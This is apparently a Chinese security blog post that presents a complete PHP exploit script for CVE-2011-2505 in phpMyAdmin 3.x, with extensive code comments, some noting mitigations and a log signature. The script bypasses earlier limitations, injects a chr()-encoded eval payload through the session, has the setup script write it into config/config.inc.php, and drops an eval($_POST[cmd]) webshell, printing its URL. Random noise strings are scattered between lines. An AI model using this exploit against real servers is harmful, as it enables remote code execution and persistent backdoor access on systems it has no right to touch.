最近在家做专职奶爸,很多个月没有关注圈内的事了,博客也一直没有更新。
昨夜带孩子整夜未眠,看到黑哥在 php security 群里关于 phpMyAdmin3 漏洞的讨论。虽然之前没看过漏洞代码,不过前段时间在微博上看到过 wofeiwo 的 exp;据黑哥说还有不那么鸡肋的利用方法,于是夜里翻出代码研究了一番,写出了这个冷饭 exp。由于我动手得晚,之前已经有很多人研究并写过 exp 了,所以这个属于炒冷饭,权当研究研究打发时间。
% a+ Q6 P* m5 c* O7 }
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是需要目标开启 session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点是谁都绕不过去的前提:config 目录必须存在且对 web 服务器进程可写。反过来说,这也是防御方最直接的缓解手段——安装完成后删除 config 目录或禁止对它的访问,下面的 exp 就无从下手。
0 P: P4 m/ |) ~. v+ R
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以绕过,所以这个漏洞其实并不那么鸡肋。
于是写了这个 PHP 版本的 exp,代码如下:
#!/usr/bin/php
<?php
// Historical, public PoC for CVE-2011-2505 (phpMyAdmin 3.x session
// manipulation). The affected 3.x branches were patched upstream; check the
// advisory for the exact fixed versions before reading anything into this.
//
// Preconditions (the script checks the first one itself further down):
//   * the target's config/ directory exists and is writable by the web
//     server process, so setup/config.php can write config/config.inc.php;
//   * the setup script is still reachable (not removed/denied after install).
//
// Usage: php <this file> <host> <path-to-pma>   -- plain HTTP on port 80 only.
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * Works only when the directory "config" exists and is writeable.
 */

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

// Target coordinates; php_request() reads both via "global".
// $path must carry a trailing slash: it is concatenated directly with the
// relative URLs used below (e.g. "/pma/" . "config/"), no normalisation.
$host = $argv[1];
$path = $argv[2];
. O- G4 {. R. C3 V9 P" m9 h; K R, q: w7 o# q
/**
 * Step 1: probe whether the "config" directory exists.
 *
 * Any response without "404" in it is taken as "exists" (e.g. a 403 for a
 * directory with listing denied). The strpos() is unanchored, so a 200
 * page whose body merely contains the digits "404" would also abort.
 * (A match at offset 0 would be falsy, but the raw response starts with
 * "HTTP/", so that case cannot occur here.)
 */
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
+ j' X) f6 S! n6 Y
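/**
 * Step 2: obtain an anonymous session id and the per-session token.
 *
 * An unauthenticated GET to index.php yields a "phpMyAdmin=<sid>" value
 * (presumably the Set-Cookie header) followed later in the raw response by
 * a "token=<32 hex>&" link parameter. Both are needed: every later request
 * must present the session cookie together with a token valid for it.
 * The pattern assumes the cookie precedes the first token in the response.
 *
 * Fixes over the original: the captures are only read when preg_match()
 * actually matched (no undefined-index notice on a dead target), and the
 * status lines print the captured values -- the original echoed the
 * literal words "token token" / "Session ID sessionid".
 */
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
$token = '';
$sessionid = '';
if (preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp)) {
    $token = $resp[3];
    $sessionid = $resp[1];
}
if ($token && $sessionid) {
    echo "[+] token $token\n";
    echo "[+] Session ID $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}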
' M$ Y' ?! u+ L2 @+ ~. x
/**
 * Step 3: plant the payload in the server-side session (CVE-2011-2505).
 *
 * The vulnerable code path copies request parameters into $_SESSION, so a
 * "_SESSION[ConfigFile][Servers][...]" query parameter ends up inside the
 * ConfigFile structure that the setup script later serialises to PHP
 * source. The array key is "*/eval(...);/*": presumably the config writer
 * emits the key inside a PHP comment, so "*/" closes that comment, the
 * eval() becomes live code, and "/*" re-opens a comment to swallow the
 * rest. The chr() chain is only the payload spelled byte by byte -- it
 * decodes to
 *   fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
 * -- which keeps quotes and spaces out of the request line, since
 * php_request() sends the URL raw without any encoding.
 *
 * "session_to_unset" looks like what steers the request into the
 * vulnerable code path; the value "t00ls" and the [host] value appear
 * arbitrary (verify against the patched source). As the original author
 * notes, the entry script is interchangeable: almost any PHP file in the
 * pma3 root reaches the same code.
 *
 * Defenders: a "_SESSION[" substring in a query string is an unambiguous
 * access-log / WAF signature for this step.
 */
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid); // Actually, almost all the php files in the home directory of pma3 can be used here.
1 T2 B- o; h+ J
/**
 * Step 4: make the setup script write the poisoned session to disk.
 *
 * POSTing submit_save=Save to setup/config.php with the planted session
 * cookie makes the config writer serialise $_SESSION['ConfigFile'] into
 * config/config.inc.php -- this is the write that requires config/ to be
 * writable by the web server. The token from step 2 is needed again; the
 * remaining form fields just satisfy the setup form.
 */
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Step 5: verify by requesting the generated config/config.inc.php.
 *
 * Executing that file runs the injected eval(), which drops a.php (an
 * eval($_POST[cmd]) stub) beside it and echoes "t00ls"; the check below
 * looks for that marker. Note this GET is itself what fires the payload
 * at the latest -- the POST above only writes the file.
 */
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
6 W: X# n/ i# L: x9 ~* [: o8 i
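/**
 * Send one raw HTTP/1.1 request to $host:80 and return the whole response
 * (status line, headers and body) as a string.
 *
 * @param string $url    path relative to the global $path; sent verbatim,
 *                       so callers must keep it free of spaces and quotes
 * @param string $data   urlencoded POST body; empty string => GET
 * @param string $cookie value for a Cookie: header; empty string => none
 * @return string        raw response, "" if the peer sent nothing
 *
 * Reads $host and $path from globals, as the rest of the script does.
 * On connection failure prints "No response from <host>" and terminates.
 *
 * Fixes over the original: the socket is closed instead of leaking until
 * script exit, and connect/read use a 10 s timeout instead of blocking
 * indefinitely on an unresponsive host.
 */
function php_request($url,$data='',$cookie=''){
    global $host, $path;

    $method = $data ? 'POST' : 'GET';
    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    if ($data) {
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length: ".strlen($data)."\r\n";
    }
    if ($cookie) {
        $packet .= "Cookie: $cookie\r\n";
    }
    // "Connection: Close" lets the read loop stop at EOF instead of having
    // to parse Content-Length or chunked encoding.
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data;

    $errno = 0;
    $errstr = '';
    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr, 10);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    stream_set_timeout($fp, 10);
    fputs($fp, $packet);

    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === false || $chunk === '') {
            break;   // read error or timeout: return what arrived so far
        }
        $resp .= $chunk;
    }
    fclose($fp);

    return $resp;
}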
7 N; t+ D2 q: [8 { / r, b' c3 N9 s9 O, c, [( z
?>
( P* G3 N! S# g5 I1 J. |